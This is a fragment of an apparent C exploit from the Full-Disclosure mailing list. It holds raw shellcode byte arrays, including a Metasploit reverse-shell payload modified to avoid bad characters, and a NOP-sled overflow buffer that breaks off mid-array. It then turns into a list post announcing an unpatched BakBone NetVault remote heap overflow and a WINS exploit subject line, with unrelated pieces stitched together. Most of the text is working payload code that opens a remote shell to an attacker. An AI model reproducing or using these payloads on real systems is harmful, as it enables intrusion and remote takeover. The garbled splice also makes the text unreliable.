"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";


char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
  NOT xored, modded by class101 for ca's xpl0it to remove the common badchar
"\x20"
  original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";

char bug[]=
"\x00\x00\x07\xD0\x00\x00\xFF\x00\x05\x39\x1F\xBC\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9

[Full-disclosure] BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow

Last Recall of a NetVault vulnerability still unpatched

http://class101.org/netv-remhbof.pdf

-
class101
Jr. Researcher
Hat-Squad.com
-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows Internet Name Service (WINS)Remote Heap Overflow Exploit